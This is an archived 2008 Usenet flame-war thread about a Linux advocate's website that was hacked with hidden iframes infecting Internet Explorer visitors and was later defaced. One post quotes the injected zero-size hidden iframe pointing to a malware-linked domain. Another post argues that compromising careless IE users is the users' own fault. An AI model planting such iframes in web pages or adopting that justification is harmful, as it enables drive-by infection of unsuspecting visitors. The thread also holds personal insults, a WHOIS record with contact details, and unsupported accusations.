> > have
> > this iframe problem... (it's nothing to do with the site but a leech-type
> > reference that get forcibly attached to it).
>
> What a wanker you are Roy.
>
> You can sit here and twist all you like, but YOUR SITE WAS COMPROMISED AND
> USED TO INFECT OTHERS. Yes, it was something to do with your site. Your
> files were infected. That makes YOUR SITE the spreader, regardless of
> where the malware was hosted, YOUR SITE was telling browsers to download
> it.

Well, at least it isn't infecting people now. The front page now is
this:

HaCkEd By LUViGARO ;D

--
--Tim Smith

Tim Smith

Mar 15, 2008, 2:47:57 PM3/15/08
In article <642dveF...@mid.dfncis.de>,

"Sebastian G." <se...@seppig.de> wrote:
> > You can sit here and twist all you like, but YOUR SITE WAS COMPROMISED AND
> > USED TO INFECT OTHERS.
>

> There's no indication that his website was compromised. Stating it in big
> letters doesn't make any less false.

You don't consider someone other than yourself editing the pages on your
website to be being compromised?

--
--Tim Smith

Hadron

Mar 15, 2008, 2:54:46 PM3/15/08
Linonut <lin...@bollsouth.nut> writes:

> * Erik Funkenbusch peremptorily fired off this memo:

>>> Hard to, with you jamming his ass above.
>>
>> Oh, please. His site gets compromised in a standard botnet attack and he
>> twists to make it seem like he's being targeted explicitly, obviously
>> because he's such a threat.
>>
>> You don't see that as paranoia?
>
> I don't see the /that/ that you see.
>
> And even in that case, no, it is not paranoia. There are plenty of
> COLA-lurking clowns that would have a great time if they could hack
> Roy's sites.
>
> And you know it.

Like who? According to you all the COLA "windiots" are too stupid. I
know you are. I suspect it was another Linux "advocate" who got sick and
tired of Roy bringing COLA and Linux advocacy into the gutter. Hell, it
could even have been Mark Kent as part of his MS Partner Programme.

Erik Funkenbusch

Mar 15, 2008, 2:58:04 PM3/15/08
On Sat, 15 Mar 2008 14:39:09 -0400, Linonut wrote:

> * Erik Funkenbusch peremptorily fired off this memo:

>>> Hard to, with you jamming his ass above.
>>
>> Oh, please. His site gets compromised in a standard botnet attack and he
>> twists to make it seem like he's being targeted explicitly, obviously
>> because he's such a threat.
>>
>> You don't see that as paranoia?
>
> I don't see the /that/ that you see.
>
> And even in that case, no, it is not paranoia. There are plenty of
> COLA-lurking clowns that would have a great time if they could hack
> Roy's sites.
>
> And you know it.

And you think any of them are capable of it?

But that's irrelevant, since anyone with half a brain should know that
these were not deliberate attacks against him, instead I believe he chooses
to *PORTRAY* it as a deliberate attack, knowing that many in here will
believe him.

Tim Smith

Mar 15, 2008, 2:58:42 PM3/15/08
In article <EzQCj.19709$r76...@bignews8.bellsouth.net>,

Linonut <lin...@bollsouth.nut> wrote:
> > Registrant:
> > N/A
> > Manager (man...@home-made.tv)
> > Wolfson 25
> > Rishon-Le-Zion
> > Ha Merkaz,75203
> > IL
> > Tel. +972.525920204
> >
> > Status:SUSPENDED
> > Note: This Domain Name is Suspended. In this status the domain name is
> > InActive and will not function.
>
> That entry is borked. The Zip is wrong.

What would be the right Zip? I am unable to find an online, free,
resource for Israeli zip codes that I can understand--they all seem to
be in Hebrew.

--
--Tim Smith

Hadron

Mar 15, 2008, 3:00:49 PM3/15/08
Tim Smith <reply_i...@mouse-potato.com> writes:

Too funny!

It is too!!!!!!!!!!!

Erik Funkenbusch

Mar 15, 2008, 3:08:20 PM3/15/08

Lol.

Pw3d!

David H. Lipman

Mar 15, 2008, 3:15:29 PM3/15/08
From: "Tim Smith" <reply_i...@mouse-potato.com>

The following was appended to the HTML of the web site...
{ obfuscated code }

<i frame src="hxxp://pinoc.com/count.php?o=2" width=0 height=0 style="hidden" frameborder=0
marginheight=0 marginwidth=0 scrolling=no></i frame>

As Ant noted, pinoc.com is a suspended site associated with ESTDomains.

There is a well established link between ESTDomains and malicious web sites that are
designed to do nothing more then infect the unsuspecting visitor.

The site was hacked and thus compramised.

The ONLY question that should be now asked is...
What was the exploitation vector that used to compramise the web site.

--
Dave

Tattoo Vampire

Mar 15, 2008, 3:40:17 PM3/15/08
Hadron wrote:

> Like who? According to you all the COLA "windiots" are too stupid. I
> know you are. I suspect it was another Linux "advocate" who got sick and
> tired of Roy bringing COLA and Linux advocacy into the gutter. Hell, it
> could even have been Mark Kent as part of his MS Partner Programme.

No, it was one of the Winidiots that continue to stink up this newsgroup.

Don't worry, though. We know it wasn't you, because there is no way you're
that smart.

--
Regards,
[tv]

...I don't suffer from insanity, I enjoy every minute of it.

Owner and proprietor, Trollus Amongus, LLC

Sebastian G.

Mar 15, 2008, 4:36:05 PM3/15/08
Hadron wrote:

> Bottom line : Schestowitz was infecting other peoples computers.

No, he didn't. Repeating it over and over again doesn't help you.

> And since it was only Windows machines which got infected it wouldn't
> surprise me one bit if there was more to this than meets the eye.

You're twisting correlation and causality. Only machines using *Internet
Explorer* got infected, and since Internet Explorer is primarily only
available for Windows, the obvious consequence is that almost all of the
infected machines run Windows.

> He was told ages ago about this and did NOTHING about it.

Not just that it's not him at all, why exactly should be do anything about
it. He's not harming any serious visitor, and is getting access to machines
for free, and can't be hold responsible (since the users intentionally
offered him full access to their machines).

Hadron

Mar 15, 2008, 4:38:53 PM3/15/08
"Sebastian G." <se...@seppig.de> writes:

> Hadron wrote:
>

>> Bottom line : Schestowitz was infecting other peoples computers.
>

> No, he didn't. Repeating it over and over again doesn't help you.
>
>> And since it was only Windows machines which got infected it wouldn't
>> surprise me one bit if there was more to this than meets the eye.
>

> You're twisting correlation and causality. Only machines using
> *Internet Explorer* got infected, and since Internet Explorer is

On Windows.

> primarily only available for Windows, the obvious consequence is that
> almost all of the infected machines run Windows.

>> He was told ages ago about this and did NOTHING about it.
>

> Not just that it's not him at all, why exactly should be do anything
> about it. He's not harming any serious visitor, and is getting access
> to machines for free, and can't be hold responsible (since the users
> intentionally offered him full access to their machines).

LOL: Now I see you're only trying to make Roy look worse!

You had me fooled for a minute.

Sebastian G.

Mar 15, 2008, 4:39:10 PM3/15/08
Tim Smith wrote:

Now that would be a serious indication if it's true. But this is unrelated
to the infection since a totally unmodified website including content from
potentially untrusted third party (as most big websites do) could appear
like it's infecting machines to the clueless.

Sebastian G.

Mar 15, 2008, 4:44:16 PM3/15/08
David H. Lipman wrote:

> There is a well established link between ESTDomains and malicious web sites that are
> designed to do nothing more then infect the unsuspecting visitor.

Technically that's a lie. If a user is abusing MSIE as a webbrowser, he
should be aware that he's effectively offering a remote shell to every
website he visits. If not, then he doesn't know what he's doing, and should
expect serious consequences from such ignorance as well.

An unsuspecting user would require using a secure webbrowser with a sane
configuration, which in turn can't be compromised that easily (if at all).

Sebastian G.

Mar 15, 2008, 4:54:35 PM3/15/08
Hadron wrote:

>> You're twisting correlation and causality. Only machines using
>> *Internet Explorer* got infected, and since Internet Explorer is
>
> On Windows.

That's not the reason why IE is so trivial to compromise. Running IE on
Linux using Wine, or even running the native IE port on MacOSX results in
the very same vulnerability.

>>> He was told ages ago about this and did NOTHING about it.
>>
>> Not just that it's not him at all, why exactly should be do anything
>> about it. He's not harming any serious visitor, and is getting access
>> to machines for free, and can't be hold responsible (since the users
>> intentionally offered him full access to their machines).
>
> LOL: Now I see you're only trying to make Roy look worse!

No, rather not. See: I have been running a website discussing IE
exploitation. It was encoded in XHTML 1.0 Strict and the server was
correctly serving it a application/xhtml+xml. Now the funny/stupid thing is
that IE doesn't know this MIME type by default (and Microsoft doesn't intend
to simply add it via an update), so IE users get a download dialog instead
of the website.

Someone has been asking me how people should learn about the dangers of IE
when they can't access the website with IE... my response was that they
should simply use a real webbrowser instead of abusing IE as such, and I
don't intend breaking a 100% conformant website just because they don't know
how to differ a webbrowser from an ActiveX Rich Platform Client.

Some other users have been reporting to me that my website contains some
malware. I told them that this is obviously not the case (the exploits are
intentional for education purpose), and if their virus scanners are scanning
their websites they're surfing too, then they have at least a serious
configuration problem and a waste of resources for absolutely no increase of
security (think about script obfuscation or HTTPS).

If someone decides to gain access to every user's system who connects to his
site by simply stepping through the front door by using well documented
functionality, then he may do so. After all, if the users's software
technically doesn't express their intentions, it's their problem.

John Bokma

Mar 15, 2008, 6:58:12 PM3/15/08
Hadron <hadro...@googlemail.com> wrote:

> You had me fooled for a minute.

Which is a piece of cake because your a fuckwit

foad

--
John Bokma http://johnbokma.com/

Hadron

Mar 15, 2008, 7:13:02 PM3/15/08
John Bokma <jo...@castleamber.com> writes:

> Hadron <hadro...@googlemail.com> wrote:
>
>> You had me fooled for a minute.
>
> Which is a piece of cake because your a fuckwit
>
> foad

That would "you're".

Moshe Goldfarb

Mar 15, 2008, 10:07:52 PM3/15/08
On Sat, 15 Mar 2008 18:05:18 +0100, Sebastian G. wrote:

> Erik Funkenbusch wrote:

>> On Sat, 15 Mar 2008 04:14:55 +0000, Roy Schestowitz wrote:
>>
>>> I've worked for 2 days on resolving this (it took a long time to handle
>>> 100,000+ files). Unlike probably thousands of other Web sites that still have
>>> this iframe problem... (it's nothing to do with the site but a leech-type
>>> reference that get forcibly attached to it).
>>
>> What a wanker you are Roy.
>>

>> You can sit here and twist all you like, but YOUR SITE WAS COMPROMISED AND
>> USED TO INFECT OTHERS.
>

> There's no indication that his website was compromised. Stating it in big
> letters doesn't make any less false.

COLA denial at it's finest.

Truly amazing.....

--
Moshe Goldfarb
Please visit The Hall of Linux Idiots:
http://linuxidiots.blogspot.com/

Moshe Goldfarb

Mar 15, 2008, 10:09:20 PM3/15/08

Of course they are going to believe him.
They are in denial.

Look at that guy Sebastion who is claiming it didn't even happen, even
after Roy Schestowitz admitted it.

Truly amazing.

Some of these Linux advocates are just like zombies.

Moshe Goldfarb

Mar 15, 2008, 10:17:36 PM3/15/08
On Sat, 15 Mar 2008 19:41:30 +0100, Hadron wrote:

> Linonut <lin...@bollsouth.nut> writes:
>
>> * Erik Funkenbusch peremptorily fired off this memo:
>>
>>> What a wanker you are Roy.
>>>
>>> You can sit here and twist all you like, but YOUR SITE WAS COMPROMISED AND
>>> USED TO INFECT OTHERS. Yes, it was something to do with your site. Your
>>> files were infected. That makes YOUR SITE the spreader, regardless of
>>> where the malware was hosted, YOUR SITE was telling browsers to download
>>> it.
>>>
>>> Way to make yourself feel special, Roy.
>>>
>>> *EVERY* IP ADDRESS IN THE WORLD has many hacking attempts made against it,
>>> every single day.
>>>
>>> No, there are clearly a lot of botnets out there attempting to attack
>>> virtually every IP address in the world. You're not special Roy, it
>>> happens to everyone. Get over it.
>>
>> Hard to, with you jamming his ass above.
>
> Not that I expect a liar and fraud like you to understand, but which
> part of what Erik said was WRONG Liarnut?
>
> Bottom line : Schestowitz was infecting other peoples computers. And
> since it was only Windows machines which got infected it wouldn't
> surprise me one bit if there was more to this than meets the eye. He was
> told ages ago about this and did NOTHING about it.

The classic signs of a narcissist.
Me?
It can't possibly be *me* because *I* am too smart for this.

Yes, Schestowitz knew about this and I wouldn't be surprised if he wasn't
behind it to infect other people's machines.

With Roy Schestowitz, nothing would surprise me.

> And now he starts waffling on about how is ip was attacked? Whoopee
> Doo. It happens to everyone on broadband EVERY DAY!

The blinking "Internet LED" probably has him totally baffled.

> The fact is that he is an incompetent big head with a persecution
> complex. Him and Mark Kent have been made to look like the boobies they
> are in the past few days.

They are falling faster than the walls of Jericho.
That is what happens when your real motives are different than your true
motives.

> You should be ashamed of yourself supporting such phonies and
> idiots. They do more to harm the Linux cause than MS ever could!

They sure do.
For anyone new to Linux who starts googling Scehstowitz, and how can you
miss him because his name and websites are splattered everywhere, they will
get the impression that Linux is run by lunatics.

Moshe Goldfarb

Mar 15, 2008, 10:19:27 PM3/15/08
On Sat, 15 Mar 2008 11:45:45 -0700, Tim Smith wrote:

Hahahahahahhahahahahhahahahahahhahahah!!!!!!!!!!!!!!!!!!

Roy Schestowitz wanted attention, now he *has* attention....

Moshe Goldfarb

Mar 15, 2008, 10:21:07 PM3/15/08

I wonder if Mark Kent's computer is infected as well?

And what about all those connections Make Kent supports for other people
who also use his computer to access USENET?

Has it spread to them as well?

I can't wait to see how Schestowitz and Kent try to explain this one away.

Moshe Goldfarb

Mar 15, 2008, 10:27:24 PM3/15/08
On Sat, 15 Mar 2008 14:50:40 +0100, Dr. Bill wrote:

> "Anonymous" <nob...@remailer.paranoici.org> schreef in bericht
>> On Fri, 14 Mar 2008 17:58:24 +0100, "Dr. Bill"
>> <bill_dctr...@yahoo.com> wrote:
>>
>>>Roy Schestowitz, a lintard / spammer from cola is spreading virusses.For
>>>instance, when an "Average Joe" windowsuser, who probably wants more
>>>information about Linux, visits it's website, Average Joe's computer gets
>>>infested with a virus / trojan. Great example of Linux advocating in cola.
>>>http://www.angelfire.com/psy/doctorbill/Schestowitz.com.jpg
>>
>> I've got McAfee as well, latest virus definitions have been installed.
>> I did not get this message after visiting the site
>> http://www.schestowitz.com/. When do you get it?

> I have McAfee VirusScan Enterprise v8.5.0i-[full][multlang] on my vista
> machine.

> http://www.angelfire.com/psy/doctorbill/Schestowitz.com.jpg
> After infesting probably 10th of thousands xxxxx machines,
> http://www.schestowitz.com/ , is clean for now.
> Reading Roy's (fuckhead/SPAMMER) replies, he doesn't fully understand that
> HE is responsible to have this site online, so HE's responsible for the
> damage done or HE has to build a lawsuit against the hackers, if he isn't
> the "hacker" himself.
> Roy is a bit angry for some time now. All his actions against Novell, M$
> mean nothing. Both companies flourish, do better than ever before. Roy is
> losing his battle's and he realizes that fact.
> B.t.w. I reported him at: www.microsoft.com / MVP's org / among others.
> Microsoft said they are building a strong lawsuit against Roy. This guy is
> suicidal and digging his own grave.

Sites get hacked all the time and Schestowitz is no exception, although his
pompous attitude and narcissistic and arrogant personality will never let
him understand that he is just like the rest of the fish out there.

The truth is, that his various hate sites have attracted a lot of attention
which is exactly what he wanted.
His entire COLA crap flooding is nothing more than an excerise in self
promotion and Internet search engine seeding and he has gotten what he
asked for.
Unfortunately the attention is now causing him grief because evidently he
has pissed off enough people to cause them to attack his sites.

I'm sure the various hate group sites (PETA .ELF etc) get attacked all the
time.

Roy just isn't smart enough to secure his site.
Considering he was unable to set up a simple filter in knode, his
programming skills are probably not too sharp.

Maybe he should consider hiring someone to maintain his various sites
because now he is a lightening rod for attacks.

Dr.Hal0nf1r£$

Mar 15, 2008, 11:20:41 PM3/15/08
chrisv wrote:
> chrisv wrote:
>> "chrisv" <chr...@nospam.invalid> wrote

>>> *plonk*
>> *plonk* , bro!
>
> Don't *plonk* me, bro!

Are you on the right pills?

Dr.Hal0nf1r£$

Mar 15, 2008, 11:25:25 PM3/15/08

Maybe it's time he started using Windows?

> Maybe he should consider hiring someone to maintain his various sites
> because now he is a lightening rod for attacks.

A rod that's losing weight?

Roy Schestowitz

Mar 16, 2008, 12:55:23 AM3/16/08
____/ Linonut on Saturday 15 March 2008 16:59 : \____

> * Dr. Bill peremptorily fired off this memo:

>> I have McAfee VirusScan Enterprise v8.5.0i-[full][multlang] on my vista
>> machine.
>

> Ha ha, your machine /needs/ anti-malware measures.
>

>> HE is responsible to have this site online, so HE's responsible for the
>> damage done or HE has to build a lawsuit against the hackers, if he isn't
>> the "hacker" himself.
>

> Where's K-Man when you need him to rip Dr. Bill a new one for his
> supreme silliness?

The sites run on a shared server, so even if I protect my sites properly
(primarily by keeping software up to date), I am susceptible to attacks
directed at 'neighbours'. This is nothing out of the ordinary. The host is
often more responsible than the webmaster, unless it's a dedicated server
maintained solely by a Webmaster, which is extremely rare.

--
~~ Best of wishes

Roy S. Schestowitz

Roy Schestowitz

Mar 16, 2008, 2:21:50 AM3/16/08
____/ Linonut on Saturday 15 March 2008 16:59 : \____

> * Dr. Bill peremptorily fired off this memo:
>
>> I have McAfee VirusScan Enterprise v8.5.0i-[full][multlang] on my vista
>> machine.
>
> Ha ha, your machine /needs/ anti-malware measures.
>
>> HE is responsible to have this site online, so HE's responsible for the
>> damage done or HE has to build a lawsuit against the hackers, if he isn't
>> the "hacker" himself.
>
> Where's K-Man when you need him to rip Dr. Bill a new one for his
> supreme silliness?

Just as a little update: the host reckons that someone on this shared server
may have had the /filesystem/ compromised. He wants to move my account to a
separate physical server with a fresh filesystem on Monday.

With shared servers, it's almost impossible to know the cause of the issue, but
early signs pointed at an unpatched phpBB, although it could actually come
from a separate account.

And no, I'm not pretending that my site is being attacked because it's me. Many
servers, including Windows ones, are being targeted this week. Watch the news
and see that I'm just one among many. It's a flood of attacks live never seen
before. Actually, I'm fortunate not to be affected as badly as many others and
no data loss is expected (I have full backups).

The trolls are spreading a lot of lies at the moment (I've gone to Google
Groups to view it unfiltered). Don't believe a word they say. None of the
damage was severe and I removed the iframes as soon as I saw them in order to
ensure Windows/MSIE users are not harmed.

Perhaps it's time for the trolls to attack ZDNet, Trend Micro (ironically a
security 'expert') and the most visited site called Yahoo for having similar
issues. There are many more examples I could give, but the trolls can just
read the technology/front page news for further information.

Bottom line: If you use Windows/MSIE, be worried. It's not just my Web site
that posed a risk for a short while. Lots and lots of Web site continue to
pose a much greater risk.

Time for Firefox?

--
~~ Best of wishes

Steve Ballmer is even monkier than his moniker suggests
Swap: 1510068k total, 740900k used, 769168k free, 64192k cached

Moshe Goldfarb

Mar 16, 2008, 3:01:28 AM3/16/08

Hahaha!

That's hysterical!!

Yea, Roy is certainly in need of some help.
Both technical and mental.

Moshe Goldfarb

Mar 16, 2008, 3:02:41 AM3/16/08
On Sun, 16 Mar 2008 04:55:23 +0000, Roy Schestowitz wrote:

> The sites run on a shared server, so even if I protect my sites properly
> (primarily by keeping software up to date), I am susceptible to attacks
> directed at 'neighbours'. This is nothing out of the ordinary. The host is
> often more responsible than the webmaster, unless it's a dedicated server
> maintained solely by a Webmaster, which is extremely rare.

Yawnnnn...
Blame it on someone else hey Roy Schestowitz?

Why don't you grow a spine and take responsibility for your ineptitude.

Moshe Goldfarb

Mar 16, 2008, 3:12:22 AM3/16/08
On Sun, 16 Mar 2008 06:21:50 +0000, Roy Schestowitz wrote:

> Just as a little update: the host reckons that someone on this shared server
> may have had the /filesystem/ compromised. He wants to move my account to a
> separate physical server with a fresh filesystem on Monday.

Sure he does.
You evidently fscked up everyone else's accounts on that server.
If I were the sys admin I would fumigate anything you got your hands on,
Roy Schestowitz.

I'll bet you have mead even more enemies after this little charade.

> With shared servers, it's almost impossible to know the cause of the issue, but
> early signs pointed at an unpatched phpBB, although it could actually come
> from a separate account.

No it's not.
They know it's you and it's very easy to figure it out through audit trails
and logs.

You're throwing up a smokescreen, as usual Roy Schestowitz.

> And no, I'm not pretending that my site is being attacked because it's me.

You're site is being attacked because you have pissed off some people.
You want to be high profile and libel and slander all kinds of good
companies and their people and you expect them to just sit around doing
nothing?

You over estimate yourself Roy.

> Many
> servers, including Windows ones, are being targeted this week.

Why do you have to bring Windows into everything?
This is about YOU Roy Schestowitz and why you were warned way back your
server was doing funny things when people visted it.
You did NOTHING.
And now, you are paying the price.

>Watch the news
> and see that I'm just one among many. It's a flood of attacks live never seen
> before. Actually, I'm fortunate not to be affected as badly as many others and
> no data loss is expected (I have full backups).

Sure.
You spread the disease all over the place but nothing hurts you.

What a hypocrite phony you are Roy Schestowitz.

> The trolls are spreading a lot of lies at the moment (I've gone to Google
> Groups to view it unfiltered).

Horse crap.

You were warned your site had problems.
You did nothing
You got hacked.
You spread all kinds of nasties to whomever visited your sites.

Good job Roy Schestowitz.

>Don't believe a word they say. None of the
> damage was severe and I removed the iframes as soon as I saw them in order to
> ensure Windows/MSIE users are not harmed.

Baloney.

You were warned MONTHS AGO.
You did NOTHING.

I wouldn't be surprised to learn that you planted the nasty yourself in
order to piss off the Windows users, whom you hate and loath.

> Time for Firefox?

Time for you to start listening to people and stop blaming others for your
ineptitude.

Be a man for a change Schestowitz and stop crying in your Jolt.

Take responsibility, suck it up, learn from it and move on.

You're pathetic and it's obvious why you are still hiding in school.
You wouldn't be able to cope with a real job, in the real world where you
have to deal with real problems.

chrisv

Mar 16, 2008, 6:13:52 AM3/16/08
"Dr.Hal0nf1r£$" <fem...@nospam.kustomkomputa.co.uk.invalid> schreef in
bericht news:qJCdnWzgkZ-...@bt.com...
*PLONK*, sister!

Linonut

Mar 16, 2008, 11:18:33 AM3/16/08
* Erik Funkenbusch peremptorily fired off this memo:

>> And even in that case, no, it is not paranoia. There are plenty of
>> COLA-lurking clowns that would have a great time if they could hack
>> Roy's sites.
>>
>> And you know it.
>
> And you think any of them are capable of it?

It doesn't matter. They are only a handshake away from someone who is
capable.

> But that's irrelevant, since anyone with half a brain should know that
> these were not deliberate attacks against him, instead I believe he chooses
> to *PORTRAY* it as a deliberate attack, knowing that many in here will
> believe him.

I don't believe Roy on this one. But I do believe it was a deliberate
attack, on my own evidence. Just because it is a common attack doesn't
make it non-deliberate.

It is quite possible to me that someone said, hey, see what you can do
with this shestowitz.com site, hmm?

--
We will never make a 32-bit operating system.
-- Bill Gates, At the launch of MSX[3]

Linonut

Mar 16, 2008, 11:21:47 AM3/16/08
* Erik Funkenbusch peremptorily fired off this memo:

> On Sat, 15 Mar 2008 11:45:45 -0700, Tim Smith wrote:

So much for Erik's claim that Roy is silly in claiming his site was
specifically targeted.

Really enjoying yourselves, huh boys?

--
There are people who don't like capitalism, and people who don't like PCs.
But there's no-one who likes the PC who doesn't like Microsoft.

Linonut

Mar 16, 2008, 11:24:47 AM3/16/08

> In article <EzQCj.19709$r76...@bignews8.bellsouth.net>,
> Linonut <lin...@bollsouth.nut> wrote:
>> > Registrant:
>> > N/A
>> > Manager (man...@home-made.tv)
>> > Wolfson 25
>> > Rishon-Le-Zion
>> > Ha Merkaz,75203
>> > IL
>> > Tel. +972.525920204
>> >
>> > Status:SUSPENDED
>> > Note: This Domain Name is Suspended. In this status the domain name is
>> > InActive and will not function.
>>
>> That entry is borked. The Zip is wrong.
>
> What would be the right Zip? I am unable to find an online, free,
> resource for Israeli zip codes that I can understand--they all seem to
> be in Hebrew.

I was stupid. Being from Illinois, that was my first (and dumbass)
thought about the meaning of IL. And I should have counted the digits
in the phone number, too.

--
One thing we have got to change in our strategy - allowing Office documents to
be rendered very well by other peoples browsers is one of the most destructive

Moshe Goldfarb

Mar 16, 2008, 11:46:54 AM3/16/08

Personally I believe there is no doubt that Roy Schestowitz was targeted,
for whatever reason.

Roy wishes to make himself known all over the Internet and that's fine.
However, when a person takes a position of hate and lies and then tries to
fool and mislead people, they tend to make a lot of enemies and very
quickly.

It could be any topic from car parts to DVD players when you start
attracting attention, like boycott and hate sites usually do, you are going
to have people who agree with you and people who don't.

My theory is that Roy Schestowitz is angering the employees of these
companies that he is constantly attacking and they in turn are offering him
and his sites up as fresh meat to be discredited by people who take pride
in cracking the code, so to speak.

IOW when you put up a 1000 foot steel rod in the middle of a 10 acre field
with nothing else in sight for miles, you have to expect to attract
lightening.

Add in Roy's caustic personality and the ability for him to piss people off
and now you have all the trappings of a "let's get this guy" vendetta.

Is Microsoft or Novell or any of the other companies he regularly slanders
/ libels behind this?
Highly doubtful.

However you can bet your sweet bippy that those companies are building a
case against Roy Schestowitz though and at some point, if it hasn't
happened already, he will be asked to stop.

Microsoft is like the IRS or the RIAA in that they like to make an example
of high profile people in order to scare the rest of the sheep.

Time will tell and if Roy can support his claims, he will win.
Assuming his parent's bank account holds out long enough of course.

Hadron

Mar 16, 2008, 12:20:29 PM3/16/08
Moshe Goldfarb <brick....@gmail.com> writes:

He puts people's jobs at risk too.

Moshe Goldfarb

Mar 16, 2008, 12:28:45 PM3/16/08

That's kind of what I am getting at although in reading my message I didn't
make it too clear :)

Unlike Schestowitz who sits in a dorm room SPAMMING 24x7 and sponging off
his parents money, the people he is indirectly attacking have families to
feed and I'm sure they are not taking his attacks and hate sites lightly.

Tim Smith

Mar 16, 2008, 2:51:23 PM3/16/08
In article <8WaDj.5750$Q52....@bignews9.bellsouth.net>,

Linonut <lin...@bollsouth.nut> wrote:
> >> Well, at least it isn't infecting people now. The front page now is
> >> this:
> >>
> >> HaCkEd By LUViGARO ;D
> >
> > Lol.
> >
> > Pw3d!
>
> So much for Erik's claim that Roy is silly in claiming his site was
> specifically targeted.

Certainly LUViGARO specifically decided Roy's site would be one he
HaCkEd. But why? My guess is that LUViGARO never heard of Roy until
this thread (which is widely cross-posted), read that Roy was having
some trouble cleaning up, and went for him.

The initial attack was that iframe thing, that is getting a lot of
sites. The only thing remarkable about Roy getting it is that AFTER
getting it, he continued to post about how it was an ASP and Microsoft
problem, even though his site is on Apache on Linux.

--
--Tim Smith

Jez

Mar 16, 2008, 6:35:25 PM3/16/08

The would "be" "you're"

Paul

Mar 16, 2008, 7:07:06 PM3/16/08
On Sun, 16 Mar 2008 22:35:25 +0000, Jez <j....@virgin.net> wrote:

>> That would "you're".
>
>The would "be" "you're"

"that" would be you're.

Sorry Jez, couldn't resist. <G>

Message has been deleted

Hadron

Mar 17, 2008, 12:41:49 AM3/17/08
Tim Smith <reply_i...@mouse-potato.com> writes:

Fuck off Tim. Even Roy is not so stupid to claim that.

Big Bill

Mar 17, 2008, 2:39:42 AM3/17/08
On Sun, 16 Mar 2008 23:07:06 +0000, Paul
<customer...@houstoncrafts.com> wrote:

>On Sun, 16 Mar 2008 22:35:25 +0000, Jez <j....@virgin.net> wrote:
>
>>> That would "you're".
>>
>>The would "be" "you're"
>
>"that" would be you're.

"That" would "be" "you're".

Please note the capital T.

Unlike some groups, you see, we here at AISE only have time to debate
the important issues.

BB
--

http://www.kruse.co.uk/
http://www.fat-odin.com/

Paul

Mar 17, 2008, 8:02:38 AM3/17/08
On Mon, 17 Mar 2008 06:39:42 GMT, Big Bill <bi...@kruse.co.uk> wrote:

>On Sun, 16 Mar 2008 23:07:06 +0000, Paul
><customer...@houstoncrafts.com> wrote:

>>>The would "be" "you're"
>>
>>"that" would be you're.
>>

>"That" would "be" "you're".
>
>Please note the capital T.

Yes Bill, that happens at the beginning of sentances. Just like mine
was :)

>Unlike some groups, you see, we here at AISE only have time to debate
>the important issues.
>
>BB

chrisv

Mar 17, 2008, 8:32:36 AM3/17/08
Dr.Hal0nf1rŁ$ wrote:

>Isn't that a standard

*plonk*

chrisv

Mar 17, 2008, 8:37:32 AM3/17/08
Shiva wrote:

>>comp.os.linux.advocacy, COLA, (it's close with COLON) widely known as "The
>>rectum of usenet".
>
>That's because posters like KUTLOZE SCHEEFGEPOEPTE infest COLA with
>their crap.

Well, you read it once, figure out what it is, and never read it
again. No problem.

Hadron

Mar 17, 2008, 8:55:11 AM3/17/08
Paul <customer...@houstoncrafts.com> writes:

> On Mon, 17 Mar 2008 06:39:42 GMT, Big Bill <bi...@kruse.co.uk> wrote:
>
>>On Sun, 16 Mar 2008 23:07:06 +0000, Paul
>><customer...@houstoncrafts.com> wrote:

>>>"that" would be you're.
>>>

>>"That" would "be" "you're".
>>
>>Please note the capital T.
>
> Yes Bill, that happens at the beginning of sentances. Just like mine
> was :)

What's a "sentance"?

:-;

Jez